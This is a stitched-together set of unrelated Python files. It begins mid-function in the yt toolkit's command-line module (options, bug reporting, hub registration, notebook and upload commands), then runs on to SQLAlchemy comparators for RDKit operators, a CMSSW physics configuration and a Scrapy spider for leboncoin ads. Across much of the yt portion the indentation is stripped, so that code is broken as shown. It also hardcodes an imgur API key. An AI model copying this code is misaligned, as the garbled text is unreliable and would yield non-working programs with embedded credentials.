elif len(values) == 2 and namespace.basename is not None:
datasets = ["%s%04i" % (namespace.basename, r)
for r in range(int(values[0]), int(values[1]), namespace.skip) ]
else:
datasets = values
namespace.ds = [_fix_ds(ds) for ds in datasets]
_common_options = dict(
all = dict(longname="--all", dest="reinstall",
default=False, action="store_true",
help="Reinstall the full yt stack in the current location."),
ds = dict(short="ds", action=GetParameterFiles,
nargs="+", help="datasets to run on"),
ods = dict(action=GetParameterFiles, dest="ds",
nargs="*", help="(Optional) datasets to run on"),
axis = dict(short="-a", longname="--axis",
action="store", type=int,
dest="axis", default=4,
help="Axis (4 for all three)"),
log = dict(short="-l", longname="--log",
action="store_true",
dest="takelog", default=True,
help="Use logarithmic scale for image"),
linear = dict(longname="--linear",
action="store_false",
dest="takelog",
help="Use linear scale for image"),
text = dict(short="-t", longname="--text",
action="store", type=str,
dest="text", default=None,
help="Textual annotation"),
field = dict(short="-f", longname="--field",
action="store", type=str,
dest="field", default="density",
help="Field to color by"),
weight = dict(short="-g", longname="--weight",
action="store", type=str,
dest="weight", default=None,
help="Field to weight projections with"),
cmap = dict(longname="--colormap",
action="store", type=str,
dest="cmap", default="algae",
help="Colormap name"),
zlim = dict(short="-z", longname="--zlim",
action="store", type=float,
dest="zlim", default=None,
nargs=2,
help="Color limits (min, max)"),
dex = dict(longname="--dex",
action="store", type=float,
dest="dex", default=None,
nargs=1,
help="Number of dex above min to display"),
width = dict(short="-w", longname="--width",
action="store", type=float,
dest="width", default=None,
help="Width in specified units"),
unit = dict(short="-u", longname="--unit",
action="store", type=str,
dest="unit", default='1',
help="Desired units"),
center = dict(short="-c", longname="--center",
action="store", type=float,
dest="center", default=None,
nargs=3,
help="Center, space separated (-1 -1 -1 for max)"),
max = dict(short="-m", longname="--max",
action="store_true",
dest="max",default=False,
help="Center the plot on the density maximum"),
bn = dict(short="-b", longname="--basename",
action="store", type=str,
dest="basename", default=None,
help="Basename of datasets"),
output = dict(short="-o", longname="--output",
action="store", type=str,
dest="output", default="frames/",
help="Folder in which to place output images"),
outputfn= dict(short="-o", longname="--output",
action="store", type=str,
dest="output", default=None,
help="File in which to place output"),
skip = dict(short="-s", longname="--skip",
action="store", type=int,
dest="skip", default=1,
help="Skip factor for outputs"),
proj = dict(short="-p", longname="--projection",
action="store_true",
dest="projection", default=False,
help="Use a projection rather than a slice"),
maxw = dict(longname="--max-width",
action="store", type=float,
dest="max_width", default=1.0,
help="Maximum width in code units"),
minw = dict(longname="--min-width",
action="store", type=float,
dest="min_width", default=50,
help="Minimum width in units of smallest dx (default: 50)"),
nframes = dict(short="-n", longname="--nframes",
action="store", type=int,
dest="nframes", default=100,
help="Number of frames to generate"),
slabw = dict(longname="--slab-width",
action="store", type=float,
dest="slab_width", default=1.0,
help="Slab width in specified units"),
slabu = dict(short="-g", longname="--slab-unit",
action="store", type=str,
dest="slab_unit", default='1',
help="Desired units for the slab"),
ptype = dict(longname="--particle-type",
action="store", type=int,
dest="ptype", default=2,
help="Particle type to select"),
agecut = dict(longname="--age-cut",
action="store", type=float,
dest="age_filter", default=None,
nargs=2,
help="Bounds for the field to select"),
uboxes = dict(longname="--unit-boxes",
action="store_true",
dest="unit_boxes",
help="Display heldsul unit boxes"),
thresh = dict(longname="--threshold",
action="store", type=float,
dest="threshold", default=None,
help="Density threshold"),
dm_only = dict(longname="--all-particles",
action="store_false",
dest="dm_only", default=True,
help="Use all particles"),
grids = dict(longname="--show-grids",
action="store_true",
dest="grids", default=False,
help="Show the grid boundaries"),
time = dict(longname="--time",
action="store_true",
dest="time", default=False,
help="Print time in years on image"),
contours = dict(longname="--contours",
action="store",type=int,
dest="contours", default=None,
help="Number of Contours for Rendering"),
contour_width = dict(longname="--contour_width",
action="store",type=float,
dest="contour_width", default=None,
help="Width of gaussians used for rendering."),
enhance = dict(longname="--enhance",
action="store_true",
dest="enhance", default=False,
help="Enhance!"),
valrange = dict(short="-r", longname="--range",
action="store", type=float,
dest="valrange", default=None,
nargs=2,
help="Range, space separated"),
up = dict(longname="--up",
action="store", type=float,
dest="up", default=None,
nargs=3,
help="Up, space separated"),
viewpoint = dict(longname="--viewpoint",
action="store", type=float,
dest="viewpoint", default=[1., 1., 1.],
nargs=3,
help="Viewpoint, space separated"),
pixels = dict(longname="--pixels",
action="store",type=int,
dest="pixels", default=None,
help="Number of Pixels for Rendering"),
halos = dict(longname="--halos",
action="store", type=str,
dest="halos",default="multiple",
help="Run halo profiler on a 'single' halo or 'multiple' halos."),
halo_radius = dict(longname="--halo_radius",
action="store", type=float,
dest="halo_radius",default=0.1,
help="Constant radius for profiling halos if using hop output files with no radius entry. Default: 0.1."),
halo_radius_units = dict(longname="--halo_radius_units",
action="store", type=str,
dest="halo_radius_units",default="1",
help="Units for radius used with --halo_radius flag. Default: '1' (code units)."),
halo_hop_style = dict(longname="--halo_hop_style",
action="store", type=str,
dest="halo_hop_style",default="new",
help="Style of hop output file. 'new' for yt_hop files and 'old' for enzo_hop files."),
halo_dataset = dict(longname="--halo_dataset",
action="store", type=str,
dest="halo_dataset",default=None,
help="HaloProfiler dataset."),
make_profiles = dict(longname="--make_profiles",
action="store_true", default=False,
help="Make profiles with halo profiler."),
make_projections = dict(longname="--make_projections",
action="store_true", default=False,
help="Make projections with halo profiler.")
)
def _get_yt_stack_date():
if "YT_DEST" not in os.environ:
print("Could not determine when yt stack was last updated.")
return
date_file = os.path.join(os.environ["YT_DEST"], ".yt_update")
if not os.path.exists(date_file):
print("Could not determine when yt stack was last updated.")
return
print("".join(file(date_file, 'r').readlines()))
print("To update all dependencies, run \"yt update --all\".")
def _update_yt_stack(path):
"Rerun the install script to updated all dependencies."
install_script = os.path.join(path, "doc/install_script.sh")
if not os.path.exists(install_script):
print()
print("Install script not found!")
print("The install script should be here: %s," % install_script)
print("but it was not.")
return
print()
print("We will now attempt to update the yt stack located at:")
print(" %s." % os.environ["YT_DEST"])
print()
print("[hit enter to continue or Ctrl-C to stop]")
try:
raw_input()
except:
sys.exit(0)
os.environ["REINST_YT"] = "1"
ret = subprocess.call(["bash", install_script])
print()
if ret:
print("The install script seems to have failed.")
print("Check the output above.")
else:
print("The yt stack has been updated successfully.")
print("Now get back to work!")
def get_yt_version():
try:
from yt.__hg_version__ import hg_version
return hg_version
except ImportError:
pass
import pkg_resources
yt_provider = pkg_resources.get_provider("yt")
path = os.path.dirname(yt_provider.module_path)
if not os.path.isdir(os.path.join(path, ".hg")): return None
version = get_hg_version(path)
return version
# This code snippet is modified from Georg Brandl
def bb_apicall(endpoint, data, use_pass = True):
uri = 'https://api.bitbucket.org/1.0/%s/' % endpoint
# since bitbucket doesn't return the required WWW-Authenticate header when
# making a request without Authorization, we cannot use the standard urllib2
# auth handlers; we have to add the requisite header from the start
if data is not None:
data = urllib.parse.urlencode(data)
req = urllib.request.Request(uri, data)
if use_pass:
username = raw_input("Bitbucket Username? ")
password = getpass.getpass()
upw = '%s:%s' % (username, password)
req.add_header('Authorization', 'Basic %s' % base64.b64encode(upw).strip())
return urllib.request.urlopen(req).read()
class YTBugreportCmd(YTCommand):
name = "bugreport"
description = \
"""
Report a bug in yt
"""
def __call__(self, args):
print("===============================================================")
print()
print("Hi there! Welcome to the yt bugreport taker.")
print()
print("===============================================================")
print("At any time in advance of the upload of the bug, you should feel free")
print("to ctrl-C out and submit the bug report manually by going here:")
print(" http://bitbucket.org/yt_analysis/yt/issues/new")
print()
print("Also, in order to submit a bug through this interface, you")
print("need a Bitbucket account. If you don't have one, exit this ")
print("bugreport now and run the 'yt bootstrap_dev' command to create one.")
print()
print("Have you checked the existing bug reports to make")
print("sure your bug has not already been recorded by someone else?")
print(" http://bitbucket.org/yt_analysis/yt/issues?status=new&status=open")
print()
print("Finally, are you sure that your bug is, in fact, a bug? It might")
print("simply be a misunderstanding that could be cleared up by")
print("visiting the yt irc channel or getting advice on the email list:")
print(" http://yt-project.org/irc.html")
print(" http://lists.spacepope.org/listinfo.cgi/yt-users-spacepope.org")
print()
summary = raw_input("Press <enter> if you remain firm in your conviction to continue.")
print()
print()
print("Okay, sorry about that. How about a nice, pithy ( < 12 words )")
print("summary of the bug? (e.g. 'Particle overlay problem with parallel ")
print("projections')")
print()
try:
current_version = get_yt_version()
except:
current_version = "Unavailable"
summary = raw_input("Summary? ")
bugtype = "bug"
data = dict(title = summary, type=bugtype)
print()
print("Okay, now let's get a bit more information.")
print()
print("Remember that if you want to submit a traceback, you can run")
print("any script with --paste or --detailed-paste to submit it to")
print("the pastebin and then include the link in this bugreport.")
if "EDITOR" in os.environ:
print()
print("Press enter to spawn your editor, %s" % os.environ["EDITOR"])
loki = raw_input()
tf = tempfile.NamedTemporaryFile(delete=False)
fn = tf.name
tf.close()
popen = subprocess.call("$EDITOR %s" % fn, shell = True)
content = open(fn).read()
try:
os.unlink(fn)
except:
pass
else:
print()
print("Couldn't find an $EDITOR variable. So, let's just take")
print("take input here. Type up your summary until you're ready")
print("to be done, and to signal you're done, type --- by itself")
print("on a line to signal your completion.")
print()
print("(okay, type now)")
print()
lines = []
while 1:
line = raw_input()
if line.strip() == "---": break
lines.append(line)
content = "\n".join(lines)
content = "Reporting Version: %s\n\n%s" % (current_version, content)
endpoint = "repositories/yt_analysis/yt/issues"
data['content'] = content
print()
print("===============================================================")
print()
print("Okay, we're going to submit with this:")
print()
print("Summary: %s" % (data['title']))
print()
print("---")
print(content)
print("---")
print()
print("===============================================================")
print()
print("Is that okay? If not, hit ctrl-c. Otherwise, enter means")
print("'submit'. Next we'll ask for your Bitbucket Username.")
print("If you don't have one, run the 'yt bootstrap_dev' command.")
print()
loki = raw_input()
retval = bb_apicall(endpoint, data, use_pass=True)
import json
retval = json.loads(retval)
url = "http://bitbucket.org/yt_analysis/yt/issue/%s" % retval['local_id']
print()
print("===============================================================")
print()
print("Thanks for your bug report! Together we'll make yt totally bug free!")
print("You can view bug report here:")
print(" %s" % url)
print()
print("Keep in touch!")
print()
class YTHubRegisterCmd(YTCommand):
name = "hub_register"
description = \
"""
Register a user on the Hub: http://hub.yt-project.org/
"""
def __call__(self, args):
# We need these pieces of information:
# 1. Name
# 2. Email
# 3. Username
# 4. Password (and password2)
# 5. (optional) URL
# 6. "Secret" key to make it epsilon harder for spammers
        if ytcfg.get("yt","hub_api_key") != "":
            print("You seem to already have an API key for the hub in")
            print("~/.yt/config . Delete this if you want to force a")
            print("new user registration.")
            sys.exit(1)
print("Awesome! Let's start by registering a new user for you.")
print("Here's the URL, for reference: http://hub.yt-project.org/ ")
print()
print("As always, bail out with Ctrl-C at any time.")
print()
print("What username would you like to go by?")
print()
username = raw_input("Username? ")
if len(username) == 0: sys.exit(1)
print()
print("To start out, what's your name?")
print()
name = raw_input("Name? ")
if len(name) == 0: sys.exit(1)
print()
print("And your email address?")
print()
email = raw_input("Email? ")
if len(email) == 0: sys.exit(1)
print()
print("Please choose a password:")
print()
while 1:
password1 = getpass.getpass("Password? ")
password2 = getpass.getpass("Confirm? ")
if len(password1) == 0: continue
if password1 == password2: break
print("Sorry, they didn't match! Let's try again.")
print()
print()
print("Would you like a URL displayed for your user?")
print("Leave blank if no.")
print()
url = raw_input("URL? ")
print()
print("Okay, press enter to register. You should receive a welcome")
print("message at %s when this is complete." % email)
print()
loki = raw_input()
data = dict(name = name, email = email, username = username,
password = password1, password2 = password2,
url = url, zap = "rowsdower")
data = urllib.parse.urlencode(data)
hub_url = "https://hub.yt-project.org/create_user"
req = urllib.request.Request(hub_url, data)
try:
status = urllib.request.urlopen(req).read()
except urllib.error.HTTPError as exc:
if exc.code == 400:
print("Sorry, the Hub couldn't create your user.")
print("You can't register duplicate users, which is the most")
print("common cause of this error. All values for username,")
print("name, and email must be unique in our system.")
sys.exit(1)
        except urllib.error.URLError as exc:
print("Something has gone wrong. Here's the error message.")
raise exc
print()
print("SUCCESS!")
print()
class YTInstInfoCmd(YTCommand):
name = ["instinfo", "version"]
args = (
dict(short="-u", longname="--update-source", action="store_true",
default = False,
help="Update the yt installation, if able"),
dict(short="-o", longname="--output-version", action="store",
default = None, dest="outputfile",
help="File into which the current revision number will be" +
"stored")
)
description = \
"""
Get some information about the yt installation
"""
def __call__(self, opts):
import pkg_resources
import yt
yt_provider = pkg_resources.get_provider("yt")
path = os.path.dirname(yt_provider.module_path)
print()
print("yt module located at:")
print(" %s" % (path))
update_supp = False
if "YT_DEST" in os.environ:
spath = os.path.join(
os.environ["YT_DEST"], "src", "yt-supplemental")
if os.path.isdir(spath):
print("The supplemental repositories are located at:")
print(" %s" % (spath))
update_supp = True
vstring = get_yt_version()
if vstring == -1:
vstring = "unknown"
if vstring is not None:
print()
print("The current version and changeset for the code is:")
print()
print("---")
print("Version = %s" % yt.__version__)
print("Changeset = %s" % vstring.strip().decode("utf-8"))
print("---")
print()
if "site-packages" not in path:
print("This installation CAN be automatically updated.")
if opts.update_source:
update_hg(path)
print("Updated successfully.")
_get_yt_stack_date()
elif opts.update_source:
print()
print("YT site-packages not in path, so you must")
print("update this installation manually by committing and")
print("merging your modifications to the code before")
print("updating to the newest changeset.")
print()
if vstring is not None and opts.outputfile is not None:
open(opts.outputfile, "w").write(vstring)
class YTLoadCmd(YTCommand):
name = "load"
description = \
"""
Load a single dataset into an IPython instance
"""
args = ("ds", )
def __call__(self, args):
if args.ds is None:
print("Could not load file.")
sys.exit()
import yt.mods
import yt
import IPython
from distutils import version
if version.LooseVersion(IPython.__version__) <= version.LooseVersion('0.10'):
api_version = '0.10'
else:
api_version = '0.11'
local_ns = yt.mods.__dict__.copy()
local_ns['ds'] = args.ds
local_ns['pf'] = args.ds
local_ns['yt'] = yt
if api_version == '0.10':
shell = IPython.Shell.IPShellEmbed()
shell(local_ns = local_ns,
header =
"\nHi there! Welcome to yt.\n\nWe've loaded your dataset as 'ds'. Enjoy!"
)
else:
from IPython.config.loader import Config
import sys
cfg = Config()
# prepend sys.path with current working directory
sys.path.insert(0,'')
IPython.embed(config=cfg,user_ns=local_ns)
class YTMapserverCmd(YTCommand):
args = ("proj", "field", "weight",
dict(short="-a", longname="--axis", action="store", type=int,
dest="axis", default=0, help="Axis (4 for all three)"),
dict(short ="-o", longname="--host", action="store", type=str,
dest="host", default=None, help="IP Address to bind on"),
"ds",
)
name = "mapserver"
description = \
"""
Serve a plot in a GMaps-style interface
"""
def __call__(self, args):
if sys.version_info >= (3,0,0):
print("yt mapserver is disabled for Python 3.")
return -1
ds = args.ds
if args.axis == 4:
print("Doesn't work with multiple axes!")
return
if args.projection:
p = ProjectionPlot(ds, args.axis, args.field, weight_field=args.weight)
else:
p = SlicePlot(ds, args.axis, args.field)
from yt.gui.reason.pannable_map import PannableMapServer
mapper = PannableMapServer(p.data_source, args.field)
import yt.extern.bottle as bottle
bottle.debug(True)
if args.host is not None:
colonpl = args.host.find(":")
if colonpl >= 0:
port = int(args.host.split(":")[-1])
args.host = args.host[:colonpl]
else:
port = 8080
bottle.run(server='rocket', host=args.host, port=port)
else:
bottle.run(server='rocket')
class YTPastebinCmd(YTCommand):
name = "pastebin"
args = (
dict(short="-l", longname="--language", action="store",
default = None, dest="language",
help="Use syntax highlighter for the file in language"),
dict(short="-L", longname="--languages", action="store_true",
default = False, dest="languages",
help="Retrive a list of supported languages"),
dict(short="-e", longname="--encoding", action="store",
default = 'utf-8', dest="encoding",
help="Specify the encoding of a file (default is "
"utf-8 or guessing if available)"),
dict(short="-b", longname="--open-browser", action="store_true",
default = False, dest="open_browser",
help="Open the paste in a web browser"),
dict(short="-p", longname="--private", action="store_true",
default = False, dest="private",
help="Paste as private"),
dict(short="-c", longname="--clipboard", action="store_true",
default = False, dest="clipboard",
help="File to output to; else, print."),
dict(short="file", type=str),
)
description = \
"""
Post a script to an anonymous pastebin
"""
def __call__(self, args):
import yt.utilities.lodgeit as lo
lo.main(args.file, languages=args.languages, language=args.language,
encoding=args.encoding, open_browser=args.open_browser,
private=args.private, clipboard=args.clipboard)
class YTPastebinGrabCmd(YTCommand):
args = (dict(short="number", type=str),)
name = "pastebin_grab"
description = \
"""
Print an online pastebin to STDOUT for local use.
"""
def __call__(self, args):
import yt.utilities.lodgeit as lo
lo.main( None, download=args.number )
class YTNotebookUploadCmd(YTCommand):
args = (dict(short="file", type=str),)
description = \
"""
Upload an IPython notebook to hub.yt-project.org.
"""
name = "upload_notebook"
def __call__(self, args):
filename = args.file
if not os.path.isfile(filename):
raise IOError(filename)
if not filename.endswith(".ipynb"):
print("File must be an IPython notebook!")
return 1
import json
try:
t = json.loads(open(filename).read())['metadata']['name']
        except (ValueError, KeyError):
            print("File does not appear to be an IPython notebook.")
            return 1
if len(t) == 0:
            t = filename[:-len(".ipynb")]
from yt.utilities.minimal_representation import MinimalNotebook
mn = MinimalNotebook(filename, t)
rv = mn.upload()
print("Upload successful!")
print()
print("To access your raw notebook go here:")
print()
print(" %s" % (rv['url']))
print()
print("To view your notebook go here:")
print()
print(" %s" % (rv['url'].replace("/go/", "/nb/")))
print()
class YTPlotCmd(YTCommand):
args = ("width", "unit", "bn", "proj", "center", "zlim", "axis", "field",
"weight", "skip", "cmap", "output", "grids", "time", "ds", "max",
"log", "linear")
name = "plot"
description = \
"""
Create a set of images
"""
def __call__(self, args):
ds = args.ds
center = args.center
        if args.center is not None and tuple(args.center) == (-1, -1, -1):
mylog.info("No center fed in; seeking.")
v, center = ds.find_max("density")
if args.max:
v, center = ds.find_max("density")
elif args.center is None:
center = 0.5*(ds.domain_left_edge + ds.domain_right_edge)
center = np.array(center)
if ds.dimensionality < 3:
dummy_dimensions = np.nonzero(ds.index.grids[0].ActiveDimensions <= 1)
axes = ensure_list(dummy_dimensions[0][0])
elif args.axis == 4:
axes = range(3)
else:
axes = [args.axis]
unit = args.unit
if unit is None:
unit = 'unitary'
if args.width is None:
width = None
else:
width = (args.width, args.unit)
for ax in axes:
mylog.info("Adding plot for axis %i", ax)
if args.projection:
plt = ProjectionPlot(ds, ax, args.field, center=center,
width=width,
weight_field=args.weight)
else:
plt = SlicePlot(ds, ax, args.field, center=center,
width=width)
if args.grids:
plt.annotate_grids()
if args.time:
time = ds.current_time.in_units("yr")
plt.annotate_text((0.2,0.8), 't = %5.2e yr'%time)
plt.set_cmap(args.field, args.cmap)
plt.set_log(args.field, args.takelog)
if args.zlim:
plt.set_zlim(args.field,*args.zlim)
ensure_dir_exists(args.output)
plt.save(os.path.join(args.output,"%s" % (ds)))
class YTRPDBCmd(YTCommand):
name = "rpdb"
description = \
"""
        Connect to a currently running (on localhost) rpdb session.
Commands run with --rpdb will trigger an rpdb session with any
uncaught exceptions.
"""
args = (
dict(short="-t", longname="--task", action="store",
default = 0, dest='task',
help="Open a web browser."),
)
def __call__(self, args):
from . import rpdb
rpdb.run_rpdb(int(args.task))
class YTNotebookCmd(YTCommand):
name = ["notebook"]
args = (
dict(short="-o", longname="--open-browser", action="store_true",
default = False, dest='open_browser',
help="Open a web browser."),
dict(short="-p", longname="--port", action="store",
default = 0, dest='port',
help="Port to listen on; defaults to auto-detection."),
dict(short="-prof", longname="--profile", action="store",
default = None, dest="profile",
help="The IPython profile to use when lauching the kernel."),
dict(short="-n", longname="--no-password", action="store_true",
default = False, dest='no_password',
help="If set, do not prompt or use a password."),
)
description = \
"""
Run the IPython Notebook
"""
def __call__(self, args):
kwargs = {}
try:
# IPython 1.0+
from IPython.html.notebookapp import NotebookApp
except ImportError:
# pre-IPython v1.0
from IPython.frontend.html.notebook.notebookapp import NotebookApp
print("You must choose a password so that others cannot connect to " \
"your notebook.")
pw = ytcfg.get("yt", "notebook_password")
if len(pw) == 0 and not args.no_password:
import IPython.lib
pw = IPython.lib.passwd()
print("If you would like to use this password in the future,")
print("place a line like this inside the [yt] section in your")
print("yt configuration file at ~/.yt/config")
print()
print("notebook_password = %s" % pw)
print()
elif args.no_password:
pw = None
if args.port != 0:
kwargs['port'] = int(args.port)
if args.profile is not None:
kwargs['profile'] = args.profile
if pw is not None:
kwargs['password'] = pw
app = NotebookApp(open_browser=args.open_browser,
**kwargs)
app.initialize(argv=[])
print()
print("***************************************************************")
print()
print("The notebook is now live at:")
print()
print(" http://127.0.0.1:%s/" % app.port)
print()
print("Recall you can create a new SSH tunnel dynamically by pressing")
print("~C and then typing -L%s:localhost:%s" % (app.port, app.port))
print("where the first number is the port on your local machine. ")
print()
print("If you are using %s on your machine already, try " \
"-L8889:localhost:%s" % (app.port, app.port))
print()
print("***************************************************************")
print()
app.start()
class YTStatsCmd(YTCommand):
args = ('outputfn','bn','skip','ds','field',
dict(longname="--max", action='store_true', default=False,
dest='max', help="Display maximum of field requested through -f option."),
dict(longname="--min", action='store_true', default=False,
dest='min', help="Display minimum of field requested through -f option."))
name = "stats"
description = \
"""
Print stats and max/min value of a given field (if requested),
for one or more datasets
(default field is density)
"""
def __call__(self, args):
ds = args.ds
ds.print_stats()
vals = {}
if args.field in ds.derived_field_list:
            if args.max:
                vals['max'] = ds.find_max(args.field)
                print("Maximum %s: %0.5e at %s" % (args.field,
                      vals['max'][0], vals['max'][1]))
            if args.min:
                vals['min'] = ds.find_min(args.field)
                print("Minimum %s: %0.5e at %s" % (args.field,
                      vals['min'][0], vals['min'][1]))
if args.output is not None:
t = ds.current_time * ds['years']
with open(args.output, "a") as f:
f.write("%s (%0.5e years)\n" % (ds, t))
if 'min' in vals:
f.write('Minimum %s is %0.5e at %s\n' % (
args.field, vals['min'][0], vals['min'][1]))
if 'max' in vals:
f.write('Maximum %s is %0.5e at %s\n' % (
args.field, vals['max'][0], vals['max'][1]))
class YTUpdateCmd(YTCommand):
args = ("all", )
name = "update"
description = \
"""
Update the yt installation to the most recent version
"""
def __call__(self, opts):
import pkg_resources
import yt
yt_provider = pkg_resources.get_provider("yt")
path = os.path.dirname(yt_provider.module_path)
print()
print("yt module located at:")
print(" %s" % (path))
update_supp = False
if "YT_DEST" in os.environ:
spath = os.path.join(
os.environ["YT_DEST"], "src", "yt-supplemental")
if os.path.isdir(spath):
print("The supplemental repositories are located at:")
print(" %s" % (spath))
update_supp = True
vstring = None
if "site-packages" not in path:
vstring = get_hg_version(path)
print()
print("The current version and changeset for the code is:")
print()
print("---")
print("Version = %s" % yt.__version__)
print("Changeset = %s" % vstring.strip().decode("utf-8"))
print("---")
print()
print("This installation CAN be automatically updated.")
update_hg(path, skip_rebuild=opts.reinstall)
print("Updated successfully.")
_get_yt_stack_date()
if opts.reinstall:
_update_yt_stack(path)
        else:
            print()
            print("yt is installed in site-packages, so this command cannot")
            print("update it from a source checkout. Please update the")
            print("installation through your package manager instead")
            print("(for example: pip install --upgrade yt).")
            print()
class YTUploadImageCmd(YTCommand):
args = (dict(short="file", type=str),)
description = \
"""
Upload an image to imgur.com. Must be PNG.
"""
name = "upload_image"
def __call__(self, args):
filename = args.file
if not filename.endswith(".png"):
print("File must be a PNG file!")
return 1
import base64, json, pprint
image_data = base64.b64encode(open(filename, 'rb').read())
api_key = 'f62d550859558f28c4c214136bc797c7'
        parameters = {'key': api_key, 'image': image_data, 'type': 'base64',
                      'caption': "",
                      'title': "%s uploaded by yt" % filename}
data = urllib.parse.urlencode(parameters).encode('utf-8')
req = urllib.request.Request('http://api.imgur.com/2/upload.json', data)
try:
response = urllib.request.urlopen(req).read().decode()
except urllib.error.HTTPError as e:
print("ERROR", e)
return {'uploaded':False}
rv = json.loads(response)
if 'upload' in rv and 'links' in rv['upload']:
print()
print("Image successfully uploaded! You can find it at:")
print(" %s" % (rv['upload']['links']['original']))
print()
print("If you'd like to delete it, visit this page:")
print(" %s" % (rv['upload']['links']['delete_page']))
print()
else:
print()
print("Something has gone wrong! Here is the server response:")
print()
pprint.pprint(rv)
def run_main():
args = parser.parse_args()
# The following is a workaround for a nasty Python 3 bug:
# http://bugs.python.org/issue16308
# http://bugs.python.org/issue9253
try:
getattr(args, "func")
except AttributeError:
parser.print_help()
sys.exit(0)
args.func(args)
if __name__ == "__main__": run_main()
|
from sqlalchemy import func
from sqlalchemy import types as sqltypes
from sqlalchemy.types import UserDefinedType
from sqlalchemy.sql import operators
class MolComparator(UserDefinedType.Comparator):
def hassubstruct(self, other):
return self.operate(
operators.custom_op('@>'), other, result_type=sqltypes.Boolean
)
def issubstruct(self, other):
return self.operate(
operators.custom_op('<@'), other, result_type=sqltypes.Boolean
)
def __eq__(self, other):
return self.operate(
operators.custom_op('@='), other, result_type=sqltypes.Boolean
)
class QMolComparator(UserDefinedType.Comparator):
def issubstruct(self, other):
return self.operate(
operators.custom_op('<@'), other, result_type=sqltypes.Boolean
)
class BfpComparator(UserDefinedType.Comparator):
def tanimoto_sml(self, other):
return self.operate(
operators.custom_op('%%'), other, result_type=sqltypes.Boolean
)
def dice_sml(self, other):
return self.operate(
operators.custom_op('#'), other, result_type=sqltypes.Boolean
)
class SfpComparator(UserDefinedType.Comparator):
def tanimoto_sml(self, other):
return self.operate(
operators.custom_op('%%'), other, result_type=sqltypes.Boolean
)
def dice_sml(self, other):
return self.operate(
operators.custom_op('#'), other, result_type=sqltypes.Boolean
)
def __add__(self, other):
return func.add(self.expr, other)
def __sub__(self, other):
return func.subtract(self.expr, other)
class ReactionComparator(UserDefinedType.Comparator):
def hassubstruct(self, other):
return self.operate(
operators.custom_op('@>'), other, result_type=sqltypes.Boolean
)
def hassubstructfp(self, other):
return self.operate(
operators.custom_op('?>'), other, result_type=sqltypes.Boolean
)
def issubstruct(self, other):
return self.operate(
operators.custom_op('<@'), other, result_type=sqltypes.Boolean
)
def issubstructfp(self, other):
return self.operate(
operators.custom_op('<?'), other, result_type=sqltypes.Boolean
)
def __eq__(self, other):
return self.operate(
operators.custom_op('@='), other, result_type=sqltypes.Boolean
)
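# --- Usage sketch (assumption, not part of the original module) ---------------
# SQLAlchemy exposes methods defined on a ``comparator_factory`` directly on
# column expressions, so the comparators above are normally attached to the
# RDKit-cartridge column types. ``Mol`` below is a hypothetical minimal type
# for a PostgreSQL ``mol`` column, shown only to illustrate the wiring; the
# table and query are illustrative as well.
if __name__ == '__main__':
    from sqlalchemy import Column, Integer, MetaData, Table, select

    class Mol(UserDefinedType):
        comparator_factory = MolComparator

        def get_col_spec(self, **kwargs):
            return 'mol'

    compounds = Table(
        'compounds', MetaData(),
        Column('id', Integer, primary_key=True),
        Column('m', Mol),
    )

    # renders roughly as ``compounds.m @> :m_1`` through the custom operator
    query = select(compounds.c.id).where(compounds.c.m.hassubstruct('c1ccccc1'))
    print(query)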
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("OWNPARTICLES")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(100) )
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:/user/geisler/RelValZmumuJets_Pt_20_300_PU_START53_V6-v1_GEN-SIM-RECO.root'),
secondaryFileNames = cms.untracked.vstring('file:/user/geisler/RelValZmumuJets_Pt_20_300_PU_START53_V6-v1_GEN-SIM-DIGI-RAW-HLTDEBUG.root'),
)
#process.source = cms.Source("PoolSource",
#fileNames = cms.untracked.vstring('file:/user/geisler/QCD_Pt-15to3000_Tune2C_Flat_8TeV_pythia8_AODSIM.root'),
#)
### conditions
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.GlobalTag.globaltag = 'START53_V11::All'
### standard includes
process.load('Configuration.StandardSequences.Services_cff')
process.load('Configuration.Geometry.GeometryPilot2_cff')
process.load("Configuration.StandardSequences.RawToDigi_cff")
process.load("Configuration.EventContent.EventContent_cff")
process.load("Configuration.StandardSequences.Reconstruction_cff")
process.load("Configuration.StandardSequences.MagneticField_cff")
process.selectedPrimaryVertexQuality = cms.EDFilter("VertexSelector",
src = cms.InputTag('offlinePrimaryVertices'),
cut = cms.string("isValid & ndof >= 4 & chi2 > 0 & tracksSize > 0 & abs(z) < 24 & abs(position.Rho) < 2."),
filter = cms.bool(True),
)
### AssociationMap-specific includes
from CommonTools.RecoUtils.pf_pu_assomap_cfi import AssociationMaps
process.assMap = AssociationMaps.clone(
VertexCollection = cms.InputTag('selectedPrimaryVertexQuality'),
)
### FirstVertexTracks-specific includes
from CommonTools.RecoUtils.pf_pu_firstvertextracks_cfi import FirstVertexTracks
process.firstVertexTracks = FirstVertexTracks.clone(
AssociationMap = cms.InputTag('assMap'),
VertexCollection = cms.InputTag('selectedPrimaryVertexQuality'),
)
process.p = cms.Path(
process.selectedPrimaryVertexQuality *
process.assMap *
process.firstVertexTracks
)
process.output = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("myOutput.root"),
outputCommands = cms.untracked.vstring('drop *',
'keep *_*_*_RECO'),
)
process.out_step = cms.EndPath(process.output)
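### Usage note (not from the original file): a configuration like this is
### normally executed with the standard CMSSW driver, e.g. ``cmsRun thisConfig.py``,
### from an environment that can reach the listed input files and global tag.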
|
import scrapy
class LbcSpider(scrapy.Spider):
name = "lbc"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7'}
start_urls = ['https://www.leboncoin.fr/ventes_immobilieres/offres/ile_de_france']
def parse(self, response):
print('Spider lbc is active')
for ad_card in response.css("div.css-mi8a1d"):
yield {
'title': ad_card.css('p.css-1j9uane.e1koqxhm0::text').get(),
'price': ad_card.css('span.css-66vicj::text').get(),
'city_and_date' : ad_card.css('p._2k43C._137P-.P4PEa._3j0OU::text').get()
}
        next_link = response.css('a._3-yvP:nth-child(3)')
        if next_link:
            next_page = 'https://www.leboncoin.fr' + next_link.attrib['href']
            yield response.follow(next_page, callback=self.parse)
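# Usage note (the file name is an assumption, not part of the original spider):
# the spider can be run standalone with Scrapy's CLI, e.g.
#   scrapy runspider lbc_spider.py -o ads.json
# which writes every yielded item to ads.json.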
|
